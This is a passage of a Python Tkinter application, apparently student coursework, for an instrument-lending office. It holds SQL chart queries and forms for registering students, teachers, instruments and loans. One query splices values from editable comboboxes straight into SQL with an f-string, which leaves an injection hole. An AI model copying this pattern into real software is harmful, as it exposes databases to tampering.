2023-10-18\")\r\n connection.rollback()\r\n \r\n\r\n\r\n# ### QUERY PARA GRAFICAR INSTRUMENTOS EN TAB.5\r\ndef query_graficar_stock():\r\n \r\n \r\n query_string = f\"SELECT nombre, COUNT(*) FROM instrumento GROUP BY nombre\"\r\n \r\n \r\n try:\r\n crsr.execute(query_string)\r\n data_grafico_stock = crsr.fetchall()\r\n # display_results_in_window(data_grafico_stock) # Se muestra el resultado stock en tabla\r\n grafico_stock(data_grafico_stock)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n \r\n\r\ndef query_graficar_prestamos():\r\n print(\"Se llama query graficar prestamos\")\r\n \r\n tab5_anho = tab5_combo_anho.get()\r\n tab5_mes = tab5_combo_mes.get()\r\n\r\n if tab5_anho is None or tab5_mes is None:\r\n print(\"Comboboxesde tab5 estan vacias\")\r\n messagebox.showerror(\"Ingrese fecha\")\r\n \r\n query_string = f\"SELECT i.nombre AS instrument_name, COUNT(*) AS lending_count\\\r\n FROM solicita s\\\r\n JOIN instrumento i ON s.numserieinst = i.numserie\\\r\n WHERE EXTRACT(MONTH FROM s.fechasolicitud) = {tab5_mes}\\\r\n AND EXTRACT(YEAR FROM s.fechasolicitud) = {tab5_anho}\\\r\n GROUP BY i.nombre\\\r\n ORDER BY lending_count DESC\"\r\n \r\n \r\n try:\r\n if tab5_anho is None or tab5_mes is None:\r\n print(\"Comboboxesde tab5 estan vacias\")\r\n messagebox.showerror(\"Ingrese fecha\")\r\n else:\r\n crsr.execute(query_string)\r\n data_grafico_prestamos = crsr.fetchall()\r\n # display_results_in_window(data_grafico_stock) # Se muestra el resultado stock en tabla\r\n grafico_prestamos(data_grafico_prestamos)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n # messagebox.showerror(\"Error\", str(error))\r\n messagebox.showerror(\"Error\", \"No hay datos. \")\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n \r\n\r\n\r\n\r\n\r\n# Elementos U.I. de Home | TAB 1 ---->\r\n\r\n# ### TITULO dentro de ventana\r\nlabel_titulo = ttk.Label(\r\n tab1,\r\n text=\"Central Instrumentos ULS\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n)\r\nlabel_titulo.grid(row=0, column=0, padx=10, pady=(1,5), columnspan=20)\r\n\r\n# ### Instrucciones de uso.\r\nlabel_indicaciones = ttk.Label(\r\n tab1,\r\n text=\"Para usar el programa se pueden navegar las pestanas en la barra superior.\\\r\n \\n\\n\\nConsulta: Se obtiene informacion relevante. Seleccionar categoria en ComboBox\\n\\t y hacer consulta.\\\r\n \\n\\nRegistro: Se Registran nuevos prestamos, Estudiantes, Instrumentos, y Profesores.\\\r\n \\n\\nConsultas Inventario: Se obtiene informacion de Stock, Prestamos, Avaluo\\\r\n \\n\\nVisualizacion: Se muestra informacion de la central con Graficas.\",\r\n \r\n font=(\"BlinkMacSystemFont\", 10),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n)\r\nlabel_indicaciones.grid(row=1, column=0, padx=5, pady=(1,5), columnspan=20)\r\n\r\n# ### Agrega imagen de ULS. (Preguntar a profesor si esta bien agregar esa imagen.)\r\nimage_path = \"logo.png\"\r\nimg = Image.open(image_path)\r\nimg = img.resize((250, 120)) # dimension logo\r\nimage = ImageTk.PhotoImage(img)\r\n\r\nimage_label = ttk.Label(tab1, image=image, background=\"White\") # Se agrega fondo blanco porque es un png sin fondo.\r\nimage_label.grid(row=3, column=10, padx=10, pady=(5,10))\r\n\r\n\r\n\r\n# Elementos de U.I. De Consultas | TAB 2---->\r\n\r\n# ### 1ra consulta - VER ESTUDIANTES\r\n# Label para combobox 1\r\nlabel_combobox1 = ttk.Label(tab2, text=\"Ver Estudiantes\", font=(\"Arial\", 9, \"bold\"))\r\nlabel_combobox1.grid(row=1, column=0, padx=10, pady=10)\r\n\r\n# Btn 'Execute Combobox Query' 1\r\nexecute_combobox_button1 = ttk.Button(tab2, text=\"Hacer Consulta\", command=execute_combobox_query1, width=20)\r\nexecute_combobox_button1.grid(row=1, column=1, padx=10, pady=10)\r\n\r\n\r\n\r\n\r\n# ### 2da consulta - VER PRESTAMOS\r\n# Label para combobox 2\r\nlabel_combobox2 = ttk.Label(tab2, text=\"Ver Prestamos\", font=(\"Arial\", 9, \"bold\"))\r\nlabel_combobox2.grid(row=3, column=0, padx=10, pady=(10,0))\r\n\r\n# Combobox2\r\ncombobox_query_values2 = [\"Eventual\", \"Anual\"]\r\ncombobox_query2 = ttk.Combobox(tab2, values=combobox_query_values2)\r\ncombobox_query2.grid(row=4, column=0, padx=10, pady=(0,10))\r\n\r\n# Btn 'Execute Combobox Query' 2\r\nexecute_combobox_button2 = ttk.Button(tab2, text=\"Hacer Consulta\", command=execute_combobox_query2, width=20)\r\nexecute_combobox_button2.grid(row=4, column=1, padx=10, pady=10)\r\n\r\n\r\n\r\n\r\n# ### 3ra consulta - VER INSTRUMENTOS\r\n# Label para combobox 3\r\nlabel_combobox3 = ttk.Label(tab2, text=\"Ver Instrumentos\", font=(\"Arial\", 9, \"bold\"))\r\nlabel_combobox3.grid(row=5, column=0, padx=10, pady=(10,0))\r\n\r\n# Combobox 3\r\ncombobox_query_values3 = [\"Todos\", \"Baritono\", \"Clarinete\", \"Corno\", \"Trombon\", \"Trompeta\", \"Tuba\", \"Viola\", \"Violin\", \"Violoncello\"]\r\ncombobox_query3 = ttk.Combobox(tab2, values=combobox_query_values3)\r\ncombobox_query3.grid(row=6, column=0, padx=10, pady=(0,10))\r\n\r\n# Btn 'Execute Combobox Query' 3\r\nexecute_combobox_button3 = ttk.Button(tab2, text=\"Hacer Consulta\", command=execute_combobox_query3, width=20)\r\nexecute_combobox_button3.grid(row=6, column=1, padx=10, pady=10)\r\n\r\n\r\n\r\n\r\n# ### 4ta consulta - VER PRESTAMOS HISTORICOS DE ESTUDIANTE\r\n# Label para combobox 4\r\nlabel_combobox4 = ttk.Label(tab2, text=\"Prestamos de un Estudiante\", font=(\"Arial\", 9, \"bold\"))\r\nlabel_combobox4.grid(row=7, column=0, padx=10, pady=(10,0))\r\n\r\n# Combobox4\r\ncombobox_query4 = ttk.Entry(tab2, width=25)\r\ncombobox_query4.grid(row=8, column=0, padx=10, pady=(0,10))\r\n\r\n# Btn 'Execute Combobox Query' 4\r\nexecute_combobox_button4 = ttk.Button(tab2, text=\"Hacer Consulta\", command=execute_combobox_query4, width=20)\r\nexecute_combobox_button4.grid(row=8, column=1, padx=10, pady=10)\r\n\r\n\r\n# ### 5ta consulta - VER STOCK INSTRUMENTOS TOTAL Y DISPONIBLE\r\n# Label para combobox 5\r\nlabel_combobox5 = ttk.Label(tab2, text=\"Stock Instrumentos\", font=(\"Arial\", 9, \"bold\"))\r\nlabel_combobox5.grid(row=9, column=0, padx=10, pady=(10,0))\r\n\r\n# Combobox5\r\ncombobox_query5_values = [\"TOTAL\", \"Todos\", \"Disponibles\", \"En Reparacion\", \"En Revision\"]\r\ncombobox_query5 = ttk.Combobox(tab2, values=combobox_query5_values)\r\ncombobox_query5.grid(row=10, column=0, padx=10, pady=(0,10))\r\n\r\n# Btn 'Execute Combobox Query' 5\r\nexecute_combobox_button5 = ttk.Button(tab2, text=\"Hacer Consulta\", command=execute_combobox_query5, width=20)\r\nexecute_combobox_button5.grid(row=10, column=1, padx=10, pady=10)\r\n\r\n\r\n\r\n# Centra elementos de Tab1 - Consulta\r\ntab2.columnconfigure(0, weight=1)\r\ntab2.columnconfigure(1, weight=1)\r\n\r\n\r\n\r\n\r\n# ### Tab3 | UI de REGISTROS --->\r\n\r\n# ### Ventanas que se abren desde TAB3 REGISTRA\r\n\r\ndef print_mock():\r\n print(\"hola esto es una mock func\")\r\n\r\ndef en_desarrollo():\r\n messagebox.showerror(\"Ups!\", \"Esta funcion aun esta en desarrollo\")\r\n \r\n# ### TAB3 | Ventanas de registro\r\ndef ventana_registro_estudiante():\r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Registro de Estudiante\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_estudiante = ttk.Label(\r\n ventana_registro,\r\n text=\"Registro Estudiante\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_estudiante.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels y TextEntries para cada campo.\r\n \r\n label_rut_estudiante = ttk.Label(ventana_registro, text=\"RUT\", font=(\"Arial\", 10, \"bold\"))\r\n label_rut_estudiante.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_rut_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_rut_estudiante.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_nombre_estudiante = ttk.Label(ventana_registro, text=\"Nombre\", font=(\"Arial\", 10, \"bold\"))\r\n label_nombre_estudiante.grid(row=2, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_nombre_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_nombre_estudiante.grid(row=3, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_app1_estudiante = ttk.Label(ventana_registro, text=\"Apelido Paterno\", font=(\"Arial\", 10, \"bold\"))\r\n label_app1_estudiante.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_app1_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_app1_estudiante.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_app2_estudiante = ttk.Label(ventana_registro, text=\"Apelido Materno\", font=(\"Arial\", 10, \"bold\"))\r\n label_app2_estudiante.grid(row=4, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_app2_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_app2_estudiante.grid(row=5, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_tel_estudiante = ttk.Label(ventana_registro, text=\"Telefono\", font=(\"Arial\", 10, \"bold\"))\r\n label_tel_estudiante.grid(row=6, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_tel_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_tel_estudiante.grid(row=7, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_mail_estudiante = ttk.Label(ventana_registro, text=\"E-Mail\", font=(\"Arial\", 10, \"bold\"))\r\n label_mail_estudiante.grid(row=6, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_mail_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_mail_estudiante.grid(row=7, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_Carrera_estudiante = ttk.Label(ventana_registro, text=\"Carrera\", font=(\"Arial\", 10, \"bold\"))\r\n label_Carrera_estudiante.grid(row=8, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_carrera_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_carrera_estudiante.grid(row=9, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_CAR_estudiante = ttk.Label(ventana_registro, text=\"Certificado Alumno Regular\", font=(\"Arial\", 10, \"bold\"))\r\n label_CAR_estudiante.grid(row=8, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_CAR_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_CAR_estudiante.grid(row=9, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n # Boton para Completar Registro y sacar informacion.\r\n btn_registro_estudiante = ttk.Button(ventana_registro, text=\"Registrar Estudiante\", command=en_desarrollo, width=30)\r\n btn_registro_estudiante.grid(row=10, column=1, padx=(80,0), pady=(25,10))\r\n \r\n \r\n\r\ndef ventana_registro_profesor():\r\n # Hace las variables globales para poder acceder desde la ventana principal.\r\n # Quiza hay una mejor manera de hacer esto. Por ahora se usa GLOBAL\r\n global entry_rut_profesor, entry_nombre_profesor, entry_app1_profesor, entry_app2_profesor\r\n \r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Registro de Profesor\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_profesor = ttk.Label(\r\n ventana_registro,\r\n text=\"Registro Profesor\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_profesor.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels y TextEntries para cada campo.\r\n \r\n label_rut_profesor = ttk.Label(ventana_registro, text=\"RUT\", font=(\"Arial\", 10, \"bold\"))\r\n label_rut_profesor.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_rut_profesor = ttk.Entry(ventana_registro, width=30)\r\n entry_rut_profesor.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_nombre_profesor = ttk.Label(ventana_registro, text=\"Nombre\", font=(\"Arial\", 10, \"bold\"))\r\n label_nombre_profesor.grid(row=2, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_nombre_profesor = ttk.Entry(ventana_registro, width=30)\r\n entry_nombre_profesor.grid(row=3, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_app1_profesor = ttk.Label(ventana_registro, text=\"Apelido Paterno\", font=(\"Arial\", 10, \"bold\"))\r\n label_app1_profesor.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_app1_profesor = ttk.Entry(ventana_registro, width=30)\r\n entry_app1_profesor.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_app2_profesor = ttk.Label(ventana_registro, text=\"Apelido Materno\", font=(\"Arial\", 10, \"bold\"))\r\n label_app2_profesor.grid(row=4, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_app2_profesor = ttk.Entry(ventana_registro, width=30)\r\n entry_app2_profesor.grid(row=5, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n # Boton para Completar Registro y sacar informacion.\r\n btn_registro_profesor = ttk.Button(ventana_registro, text=\"Registrar Profesor\", command=en_desarrollo, width=30)\r\n btn_registro_profesor.grid(row=10, column=1, padx=(80,0), pady=(180,10))\r\n \r\n \r\n\r\n \r\ndef ventana_registro_instrumento():\r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Registro de Instrumento\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_instrumento = ttk.Label(\r\n ventana_registro,\r\n text=\"Registro Instrumento\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_instrumento.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels y TextEntries para cada campo.\r\n \r\n label_num_serie_instrumento = ttk.Label(ventana_registro, text=\"Numero de Serie\", font=(\"Arial\", 10, \"bold\"))\r\n label_num_serie_instrumento.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_num_serie_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_num_serie_instrumento.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_num_inv_instrumento = ttk.Label(ventana_registro, text=\"Numero de Inventario\", font=(\"Arial\", 10, \"bold\"))\r\n label_num_inv_instrumento.grid(row=2, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_num_inv_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_num_inv_instrumento.grid(row=3, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_nombre_instrumento = ttk.Label(ventana_registro, text=\"Nombre\", font=(\"Arial\", 10, \"bold\"))\r\n label_nombre_instrumento.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_nombre_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_nombre_instrumento.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_marca_instrumento = ttk.Label(ventana_registro, text=\"Marca\", font=(\"Arial\", 10, \"bold\"))\r\n label_marca_instrumento.grid(row=4, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_marca_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_marca_instrumento.grid(row=5, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_medidas_instrumento = ttk.Label(ventana_registro, text=\"Medidas\", font=(\"Arial\", 10, \"bold\"))\r\n label_medidas_instrumento.grid(row=6, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_medidas_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_medidas_instrumento.grid(row=7, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_avaluo_instrumento = ttk.Label(ventana_registro, text=\"Avaluo\", font=(\"Arial\", 10, \"bold\"))\r\n label_avaluo_instrumento.grid(row=6, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_avaluo_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_avaluo_instrumento.grid(row=7, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_estado_instrumento = ttk.Label(ventana_registro, text=\"Estado\", font=(\"Arial\", 10, \"bold\"))\r\n label_estado_instrumento.grid(row=8, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_estado_instrumento = ttk.Entry(ventana_registro, width=30)\r\n entry_estado_instrumento.grid(row=9, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n # Boton para Completar Registro y sacar informacion.\r\n btn_registro_instrumento = ttk.Button(ventana_registro, text=\"Registrar Instrumento\", command=en_desarrollo, width=30)\r\n btn_registro_instrumento.grid(row=10, column=1, padx=(80,0), pady=(25,10))\r\n \r\n\r\n\r\ndef ventana_registro_eventual():\r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Registro de Eventual\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n global entry_rut_prestamo_eventual, entry_rut2_prestamo_eventual, entry_numserie_eventual, entry_fecha_solicitud_eventual\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_eventual = ttk.Label(\r\n ventana_registro,\r\n text=\"Registro Prestamo Eventual\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_eventual.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels y TextEntries para cada campo.\r\n \r\n label_rut_prestamo_eventual = ttk.Label(ventana_registro, text=\"Rut Estudiante\", font=(\"Arial\", 10, \"bold\"))\r\n label_rut_prestamo_eventual.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_rut_prestamo_eventual = ttk.Entry(ventana_registro, width=30)\r\n entry_rut_prestamo_eventual.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_rut2_prestamo_eventual = ttk.Label(ventana_registro, text=\"Rut Encargado\", font=(\"Arial\", 10, \"bold\"))\r\n label_rut2_prestamo_eventual.grid(row=2, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_rut2_prestamo_eventual = ttk.Entry(ventana_registro, width=30)\r\n entry_rut2_prestamo_eventual.grid(row=3, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_numserie_eventual = ttk.Label(ventana_registro, text=\"Numero Serie de Instrumento\", font=(\"Arial\", 10, \"bold\"))\r\n label_numserie_eventual.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_numserie_eventual = ttk.Entry(ventana_registro, width=30)\r\n entry_numserie_eventual.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_fechainicio_eventual = ttk.Label(ventana_registro, text=\"Fecha Inicio\", font=(\"Arial\", 10, \"bold\"))\r\n label_fechainicio_eventual.grid(row=4, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_fecha_solicitud_eventual = ttk.Entry(ventana_registro, width=30)\r\n entry_fecha_solicitud_eventual.grid(row=5, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n label_info = ttk.Label(ventana_registro, text=\"Formato Fechas: YYYY-MM-DD\", font=(\"Arial\", 8, \"bold\"))\r\n label_info.grid(row=8, column=0, padx=(15,0), pady=(20,0))\r\n \r\n \r\n \r\n \r\n # Boton para Completar Registro y sacar informacion.\r\n btn_registro_eventual = ttk.Button(ventana_registro, text=\"Registrar Prestamo\", command=registrar_prestamo_eventual, width=30)\r\n btn_registro_eventual.grid(row=10, column=1, padx=(80,0), pady=(75,10))\r\n \r\n\r\n\r\n\r\ndef ventana_registro_anual():\r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Registro de Prestamo Anual\")\r\n ventana_registro.geometry(\"500x515\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_estudiante = ttk.Label(\r\n ventana_registro,\r\n text=\"Registro Anual\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_estudiante.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels y TextEntries para cada campo.\r\n \r\n label_codigo_anual = ttk.Label(ventana_registro, text=\"Codigo Contrato\", font=(\"Arial\", 10, \"bold\"))\r\n label_codigo_anual.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_codigo_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_codigo_anual.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_calle_anual = ttk.Label(ventana_registro, text=\"Calle\", font=(\"Arial\", 10, \"bold\"))\r\n label_calle_anual.grid(row=2, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_calle_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_calle_anual.grid(row=3, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_numcalle_anual = ttk.Label(ventana_registro, text=\"Numero Calle\", font=(\"Arial\", 10, \"bold\"))\r\n label_numcalle_anual.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_numcalle_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_numcalle_anual.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_comuna_anual = ttk.Label(ventana_registro, text=\"Comuna\", font=(\"Arial\", 10, \"bold\"))\r\n label_comuna_anual.grid(row=4, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_comuna_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_comuna_anual.grid(row=5, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_tel_anual = ttk.Label(ventana_registro, text=\"Telefono\", font=(\"Arial\", 10, \"bold\"))\r\n label_tel_anual.grid(row=6, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_tel_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_tel_anual.grid(row=7, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_nombre_director_anual = ttk.Label(ventana_registro, text=\"Nombre Director\", font=(\"Arial\", 10, \"bold\"))\r\n label_nombre_director_anual.grid(row=6, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_nombre_director_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_nombre_director_anual.grid(row=7, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_rut_director_anual = ttk.Label(ventana_registro, text=\"Rut Director\", font=(\"Arial\", 10, \"bold\"))\r\n label_rut_director_anual.grid(row=8, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_rut_director_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_rut_director_anual.grid(row=9, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_fechainicio_anual = ttk.Label(ventana_registro, text=\"Fecha Inicio\", font=(\"Arial\", 10, \"bold\"))\r\n label_fechainicio_anual.grid(row=8, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_fechainicio_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_fechainicio_anual.grid(row=9, column=1, padx=(80,0), pady=(0,10))\r\n \r\n label_fechatermino_anual = ttk.Label(ventana_registro, text=\"Fecha Termino\", font=(\"Arial\", 10, \"bold\"))\r\n label_fechatermino_anual.grid(row=10, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_fechatermino_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_fechatermino_anual.grid(row=11, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_fechacontrato_anual = ttk.Label(ventana_registro, text=\"Fecha Contrato\", font=(\"Arial\", 10, \"bold\"))\r\n label_fechacontrato_anual.grid(row=10, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_fechacontrato_anual = ttk.Entry(ventana_registro, width=30)\r\n entry_fechacontrato_anual.grid(row=11, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n btn_registro_anual = ttk.Button(ventana_registro, text=\"Registrar Prestamo\", command=en_desarrollo, width=27)\r\n btn_registro_anual.grid(row=14, column=1, padx=(83, 0), pady=(10, 10))\r\n \r\n \r\n\r\n\r\n# ### 1er Registro - Registrar Prestamo Eventual\r\n# Btn para Registro 1\r\n\r\n#style = ttk.Style()\r\n#style.configure(\"no_disponible\", background=\"#00ff00\")\r\n#, style=\"no_disponible\"\r\n\r\nbtn_registro1 = ttk.Button(tab3, text=\"Registrar Prestamo Eventual\", command=ventana_registro_eventual, width=50)\r\nbtn_registro1.grid(row=2, column=0, padx=10, pady=(30,10))\r\n\r\n\r\n\r\n\r\n# ### 2er Registro - Registrar Prestamo Anual\r\n# Btn para Registro 2\r\nbtn_registro2 = ttk.Button(tab3, text=\"Registrar Prestamo Anual\", command=ventana_registro_anual, width=50)\r\nbtn_registro2.grid(row=4, column=0, padx=10, pady=10)\r\n\r\n\r\n\r\n# ### 3er Registro - Registrar Estudiante\r\n# Btn para Registro 3\r\nbtn_registro3 = ttk.Button(tab3, text=\"Registrar Estudiante\", command=ventana_registro_estudiante, width=40)\r\nbtn_registro3.grid(row=6, column=0, padx=10, pady=(40,10))\r\n\r\n\r\n\r\n# ### 4er Registro - Registrar Instrumento\r\n# Btn para Registro 4\r\nbtn_registro4 = ttk.Button(tab3, text=\"Registrar Instrumento\", command=ventana_registro_instrumento, width=40)\r\nbtn_registro4.grid(row=8, column=0, padx=10, pady=10)\r\n\r\n\r\n\r\n# ### 5er Registro - Registrar Profesor\r\n# Btn para Registro 5\r\nbtn_registro5 = ttk.Button(tab3, text=\"Registrar Profesor\", command=ventana_registro_profesor, width=40)\r\nbtn_registro5.grid(row=10, column=0, padx=10, pady=10)\r\n\r\n# Centra los elementos de la Tab3 - Registra\r\ntab3.columnconfigure(0, weight=1)\r\ntab3.columnconfigure(0, weight=1)\r\n\r\n\r\n\r\n\r\n# Elementos de U.I. De Consultas de Proyecto | TAB 4 ---->\r\n\r\n### Elementos de ventanas que abren las consultas de TAB.4\r\n\r\ndef ventana_consulta_proyecto_3():\r\n # Hace las variables globales para poder acceder desde la ventana principal.\r\n # Quiza hay una mejor manera de hacer esto. Por ahora se usa GLOBAL\r\n global ven3_entry_inicio, ven3_entry_termino\r\n \r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Consulta de proyecto\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_profesor = ttk.Label(\r\n ventana_registro,\r\n text=\"Catedras con Instrumentos Prestados\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_profesor.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels, TextEntries y combobox para cada campo.\r\n ven3_label_inicio = ttk.Label(ventana_registro, text=\"Fecha de Inicio\", font=(\"Arial\", 10, \"bold\"))\r\n ven3_label_inicio.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n ven3_entry_inicio = ttk.Entry(ventana_registro, width=30)\r\n ven3_entry_inicio.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n ven3_label_termino = ttk.Label(ventana_registro, text=\"Fecha de Termino\", font=(\"Arial\", 10, \"bold\"))\r\n ven3_label_termino.grid(row=2, column=1, padx=(45,0), pady=(20,0))\r\n \r\n ven3_entry_termino = ttk.Entry(ventana_registro, width=30)\r\n ven3_entry_termino.grid(row=3, column=1, padx=(45,0), pady=(0,10))\r\n \r\n # Instrucciones para usuario sobre FECHA\r\n ven3_label_instrucciones = 